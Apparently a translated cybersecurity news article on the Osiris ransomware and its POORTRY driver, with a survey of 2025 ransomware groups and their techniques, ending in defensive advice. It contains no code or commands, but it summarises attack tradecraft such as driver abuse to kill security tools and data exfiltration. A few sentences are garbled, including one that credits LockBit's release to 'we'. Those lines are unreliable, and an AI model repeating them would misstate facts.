Cybersecurity researchers have revealed details of a new ransomware family called Osiris that targeted major food service franchise operators in Southeast Asia in November 2025.
According to Symantec and the Carbon Black Threat Hunter Team, the attack used a malicious driver called POORTRY as part of a known technique known as BYOVD (Bring Your Own Vulnerable Driver) to disable security software.
It is worth noting that Osiris is assessed to be an entirely new ransomware strain and bears no resemblance to another variant of the same name that emerged in December 2016 as an iteration of Locky ransomware. At this time, it is unclear who the developer of this locker is and whether it is being advertised as ransomware-as-a-service (RaaS).
However, Broadcom’s cybersecurity division said it has identified clues that suggest the attackers who deployed the ransomware may have been previously involved with INC ransomware, also known as Warble.
“This attack used a wide range of land-based and dual-purpose tools, including the malicious POORTRY driver, which may have been used as part of a bring-your-own-vulnerable-driver (BYOVD) attack to disable security software,” the company said in a report shared with The Hacker News.
“The exfiltration of data into the Wasabi bucket by the attackers, and the use of a previously used version of Mimikatz with the same filename (kaz.exe) by the attackers deploying the INC ransomware, indicates a potential link between this attack and some attacks involving INC.”
Osiris has been described as an “effective cryptographic payload” that is likely to be used by experienced attackers, leveraging a hybrid encryption scheme and unique encryption keys for each file. It’s also flexible in that you can stop services, specify folders and extensions that need to be encrypted, terminate processes, drop ransom notes, and more.
By default, it is designed to kill a long list of processes and services related to Microsoft Office, Exchange, Mozilla Firefox, WordPad, Notepad, Volume Shadow Copy, Veeam, and more.
Initial signs of malicious activity on the target’s network included exfiltration of sensitive data using Rclone to a Wasabi cloud storage bucket prior to the ransomware deployment. The attack also utilized a number of dual-purpose tools, including Netscan, Netexec, and MeshAgent, as well as a custom version of Rustdesk remote desktop software.
POORTRY differs slightly from traditional BYOVD attacks in that, rather than deploying a legitimate but vulnerable driver to the target network, it uses a custom-built driver specifically designed to escalate privileges and terminate security tools.
“KillAV, a tool that deploys vulnerable drivers that terminate security processes, was also deployed on the targeted networks,” the Symantec and Carbon Black threat hunter team said. “RDP was also enabled on the network, which may have provided the attacker with remote access.”
This development comes as ransomware remains a significant threat to businesses, and the landscape is constantly changing, with some groups closing their doors and others quickly rising from the ashes or stepping in to take their place. According to an analysis of data breach sites by Symantec and Carbon Black, there were a total of 4,737 attacks by ransomware attackers in 2025, an increase of 0.8% from 4,701 in 2024.
The most active players over the past year were Akira (aka Darter or Howling Scorpius), Qilin (aka Stinkbug or Water Galura), Play (aka Balloonfly), INC, SafePay, RansomHub (aka Greenbottle), DragonForce (aka Hackledorb), Sinobi, Rhysida, and CACTUS. Some of the other notable developments in this area include:
Attackers using Akira ransomware leveraged the vulnerable Throttlestop driver, along with the Windows CardSpace user interface agent and Microsoft Media Foundation Protected Pipeline, to sideload the Bumblebee loader in attacks observed in mid-to-late 2025. The Akira ransomware campaign also exploited SonicWall SSL VPN to infiltrate the business environments of small and medium-sized businesses during mergers and acquisitions, and ultimately gain access to large, acquiring companies. Another Akira attack was found to utilize a ClickFix-style CAPTCHA validation lure to drop a .NET remote access Trojan called SectopRAT, which acts as a conduit for remote control and ransomware delivery. LockBit (also known as Syrphid), which partnered with DragonForce and Qilin in October 2025, continues to maintain its infrastructure despite law enforcement operations to cease operations in early 2024. We are also releasing variants of LockBit 5.0 targeting multiple operating systems and virtualization platforms. A key update in LockBit 5.0 is the introduction of a two-stage ransomware deployment model that separates the loader from the main payload while maximizing evasion, modularity, and destructive impact. A new RaaS operation called Sicarii has only had one victim since it first surfaced in late 2025. Although the group explicitly identifies itself as Israeli/Jewish, analysis reveals that its underground online activity is primarily conducted in Russian, and that the Hebrew content shared by the threat actors contains grammatical and semantic errors. This increased the possibility of a false flag operation. The main Sicarii operator of Sicarii uses the Telegram account “@Skibcum”. The attacker, known as Storm-2603 (also known as CL-CRI-1040 or Gold Salem), has been observed leveraging legitimate Velociraptor digital forensics and incident response (DFIR) tools as part of precursor activities leading to the deployment of Warlock, LockBit, and Babuk ransomware. The attack also leverages two drivers (‘rsndispot.sys’ and ‘kl.sys’) and ‘vmtools.exe’ to disable security solutions using BYOVD attacks.
Companies in India, Brazil, and Germany have been targeted by Makop ransomware attacks that exploit exposed and insecure RDP systems to prepare tools for network scanning, privilege escalation, disabling security software, credential dumping, and ransomware deployment. The attack uses the ‘hlpdrv.sys’ and ‘ThrottleStop.sys’ drivers for BYOVD attacks, and also deploys GuLoader to deliver ransomware payloads. This is the first documented case of Makop being distributed via a loader. Ransomware attacks use already compromised RDP credentials to gain initial access, perform reconnaissance, privilege escalation, and lateral movement via RDP, and then exfiltrate data to temporary files.[.]We ran sh on the 6th day of the breach and deployed the Lynx ransomware 3 days later. A security flaw in the encryption process associated with Obscura ransomware was found to render large files unrecoverable. “When encrypting large files, you cannot write the encrypted temporary key to the footer of the file,” Coveware said. “For files larger than 1 GB, their footers are not created at all, meaning the key needed for decryption is lost. These files are permanently unrecoverable.” A new ransomware family named 01flip is targeting a limited number of victims in the Asia-Pacific region. Written in Rust, this ransomware can target both Windows and Linux systems. The attack chain involves exploiting known security vulnerabilities (such as CVE-2019-11580) to gain a foothold on the target network. This is believed to be the work of a financially motivated attacker known as CL-CRI-1036.
To protect against targeted attacks, organizations are encouraged to monitor the use of dual-use tools, restrict access to RDP services, enforce multi-factor authentication (2FA), use application whitelisting where applicable, and implement off-site storage of backup copies.
Symantec and Carbon Black said: “Ransomware cryptographic attacks remain prevalent and remain a threat, but the emergence of new types of non-cryptographic attacks further increases the risk and creates a broader extortion ecosystem, of which ransomware may be just one part.”
Source link
